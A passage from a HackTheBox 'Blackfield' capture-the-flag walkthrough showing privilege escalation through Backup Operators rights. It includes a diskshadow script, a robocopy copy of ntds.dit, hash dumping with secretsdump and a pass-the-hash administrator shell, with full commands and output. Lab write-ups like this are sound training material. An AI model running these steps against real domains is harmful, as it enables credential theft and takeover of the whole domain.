SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

We are member of the Backup Operators, and have SeBackupPrivilege, and SeRestorePrivilege privileges, which will help us create a backup of the whole system including the ntds.dit file, and then download it with the system registry hive, and finally extract the secrets inside of it:

Privilege Escalation:

Diskshadow & robocopy:

Diskshadow creates copies of a currently used drive, while Robocopy copies files and directories from one location to another.

We will use this script alongside with diskshadow utility:

set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% O:
end backup

With this script, we will create meta.cab file to store the metadata such as creation date, time, copy size, etc.

Next we will set the context of our backup to be clientaccessible, so we can access it after the script ran, and persistent which means it will persist even if the machine was rebooted.

Then we will intiate our back with begin backup, and we will include the whole C: drive.

Lastly create to start creating our backup, and expose our backup as a network drive with the letter, and finalize the backup operation with end backup.

So lets upload that script to the target machine:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload backup_script.txt                                                                                                             
                                                                                                                                                                           
Info: Uploading /home/kali/Desktop/CTF/Machines/HackTheBox/Blackfield/backup_script.txt to C:\Users\svc_backup\Documents\backup_script.txt                                                   
                                                                                                                                                                           
Data: 240 bytes of 240 bytes copied                                                                                                                                        
                                                                                                                                                                           
Info: Upload successful!

I will pass that script to the diskshadow utility to create the shadow copy that will create a snapshot of the drive while the files are in use.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s backup_script.txt                                                                                                      
Microsoft DiskShadow version 1.0                                                                                                                                           
Copyright (C) 2013 Microsoft Corporation                                                                                                                                   
On computer:  DC01,  9/10/2025 2:53:32 PM                                                                                                                                  
                                                                                                                                                                           
-> set verbose o                                                                                                                                                           
                                                                                                                                                                           
SET VERBOSE { ON | OFF }                                                                                                                                                   
                                                                                                                                                                           
        ON                      Turn on verbose mode. This provides information about writer inclusion/exclusion.                                                          
        OFF                     Turn off verbose mode.                                                                                                                     
                                                                                                                                                                           
        Example: SET VERBOSE ON

We will notice that it did not complete, and one of the set verbose on characters was missing, this is because linux uses LF line ending, whereas windows uses crlf, so we first need to replace lf with crlf, and to do that I will use unix2dos command:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ unix2dos backup_script.txt
unix2dos: converting file backup_script.txt to DOS format...

And we will upload it again, and try to perform the backup again:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload backup_script.txt                                                                                                    
                                                                                                                                                                           
Info: Uploading /home/kali/Desktop/CTF/Machines/HackTheBox/Blackfield/backup_script.txt to C:\Users\svc_backup\Documents\backup_script.txt                                 
                                                                                                                                                                           
Data: 252 bytes of 252 bytes copied                                                                                                                                        
                                                                                                                                                                           
Info: Upload successful!                                                                                                                                                   
*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s backup_script.txt                                                                                             
Microsoft DiskShadow version 1.0                                                                                                                                           
Copyright (C) 2013 Microsoft Corporation                                                                                                                                   
On computer:  DC01,  9/10/2025 2:25:19 PM                                                                                                                                  
                                                                                                                                                                           
-> set verbose on                                                                                                                                                          
-> set metadata C:\Windows\Temp\meta.cab                                                                                                                                   
-> set context clientaccessible                                                                                                                                            
-> set context persistent                                                                                                                                                  
-> begin backup                                                                                                                                                            
-> add volume C: alias cdrive                                                                                                                                              
-> create                                                                                                                                                                  
Excluding writer "Shadow Copy Optimization Writer", because all of its components have been excluded.                                                                      
Component "\BCD\BCD" from writer "ASR Writer" is excluded from backup,                                                                                                     
because it requires volume  which is not in the shadow copy set.                                                                                                           
The writer "ASR Writer" is now entirely excluded from the backup because the top-level                                                                                     
non selectable component "\BCD\BCD" is excluded.                                                                                                                           
                                                                                                                                                                           
* Including writer "Task Scheduler Writer":                                                                                                                                
        + Adding component: \TasksStore                                                                                                                                    
                                                                                                                                                                           
* Including writer "VSS Metadata Store Writer":                                                                                                                            
        + Adding component: \WriterMetadataStore                                                                                                                           
                                                                                                                                                                           
* Including writer "Performance Counters Writer":                                                                                                                          
        + Adding component: \PerformanceCounters

* Including writer "System Writer":
        + Adding component: \System Files
        + Adding component: \Win32 Services Files

* Including writer "NTDS":
        + Adding component: \C:_Windows_NTDS\ntds
        
<snipped>

Inserted file DisF0A0.tmp into .cab file meta.cab                                                                                                                          
                                                                                                                                                                           
Querying all shadow copies with the shadow copy set ID {95596a49-37ff-4fa5-b470-64bd949f4986}                                                                              
                                                                                                                                                                           
        * Shadow copy ID = {73972dbd-d7e7-4eb8-bbaf-ab0ad7cefea3}               %cdrive%                                                                                   
                - Shadow copy set: {95596a49-37ff-4fa5-b470-64bd949f4986}       %VSS_SHADOW_SET%                                                                           
                - Original count of shadow copies = 1                                                                                                                      
                - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]                                                                            
                - Creation time: 9/10/2025 2:25:38 PM                                                                                                                      
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1                                                                                 
                - Originating machine: DC01.BLACKFIELD.local                                                                                                               
                - Service machine: DC01.BLACKFIELD.local                                                                                                                   
                - Not exposed                                                                                                                                              
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}                                                                                                      
                - Attributes:  No_Auto_Release Persistent Differential                                                                                                     
                                                                                                                                                                           
Number of shadow copies listed: 1                                                                                                                                          
-> expose %cdrive% O:                                                                                                                                                      
-> %cdrive% = {73972dbd-d7e7-4eb8-bbaf-ab0ad7cefea3}                                                                                                                       
The shadow copy was successfully exposed as E:\.                                                                                                                           
-> end backup

This time it worked.

Now we can use robocopy windows utility, to copy the ntds.dit file from newly created drive O:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> robocopy /b O:\Windows\ntds . ntds.dit 
                                                                                     
-------------------------------------------------------------------------------      
   ROBOCOPY     ::     Robust File Copy for Windows                                  
-------------------------------------------------------------------------------
                                                                                                                                                                           
  Started : Wednesday, September 10, 2025 2:29:33 PM            
   Source : O:\Windows\ntds\                                                         
     Dest : C:\Users\svc_backup\Documents\                                           
                                                                                     
    Files : ntds.dit                                                                                                                                                       
                                                                                     
  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30               
                                                                                                                                                                           
------------------------------------------------------------------------------                                                                                             
                                                                                     
                           1    O:\Windows\ntds\                                     
            New File              18.0 m        ntds.dit                             
  0.0%                                                                               
  0.3%                                                                                                                                                                     
  0.6%                                                                               
  1.0%
  100%

------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :   18.00 m   18.00 m         0         0         0         0
   Times :   0:00:01   0:00:01                       0:00:00   0:00:00


   Speed :            12450110 Bytes/sec.
   Speed :             712.401 MegaBytes/min.
   Ended : Wednesday, September 10, 2025 2:29:34 PM

We will also save the system registry hive to our current working directory:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system system                                                                                                 
The operation completed successfully.

Then download both to our kali vm:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system                                                                                                             
                                                                                                                                                                           
Info: Downloading C:\Users\svc_backup\Documents\system to system                                                                                                           
                                                                                                                                                                           
Info: Download successful!

*Evil-WinRM* PS C:\Users\svc_backup\Documents> download ntds.dit                                                                                                           
                                                                                                                                                                           
Info: Downloading C:\Users\svc_backup\Documents\ntds.dit to ntds.dit                                                                                                       
                                                                                                                                                                           
Info: Download successful!

Using impacket-secretsdump we can dump the hashes:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]                                                                                                                   
└─$ impacket-secretsdump -ntds ntds.dit -system system local                                               
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies                                                                                                 
                                                                                                                                                                           
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393                                                                                                              
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                                                                                              
[*] Searching for pekList, be patient                                                                                                                                      
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c                                                                                                          
[*] Reading and decrypting hashes from ntds.dit                                                                                                                            
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::                                                                                     
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                             
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:777b3a5045eaccfd325fabcd12450c45:::                                                                                            
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::                                                                                            
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c1f85538675d6cba8c4307b1d37d0a19:::                                                                                        
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::                                                                                          
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
<snipped>
[*] Cleaning up...

Here we have the domain administrator ntlm hash, which we can use to authenticate, I will use impacket-wmiexec this time:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ impacket-wmiexec blackfield.local/administrator@10.129.229.17 -hashes :184fb5e5178480be64824d4cd53b99ee
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
blackfield\administrator

C:\>hostname
DC01

C:\>ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::4d21:4c29:78b9:aa3d
   Link-local IPv6 Address . . . . . : fe80::4d21:4c29:78b9:aa3d%17
   IPv4 Address. . . . . . . . . . . : 10.129.229.17
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1

And we can read the flags:

C:\>type C:\Users\Administrator\Desktop\root.txt
4375a629c7c67c8e29db269060c955cb
C:\>type C:\Users\svc_backup\Desktop\user.txt
3920bb317a0bef51027e2852be64b543

PreviousReturn NextCicada

Last updated 18 days ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagAS-REP Roasting:

hashtagBloodHound:

hashtagAbuse ACL:

hashtagLateral Movement to svc_backup:

hashtagPrivilege Escalation:

hashtagDiskshadow & robocopy: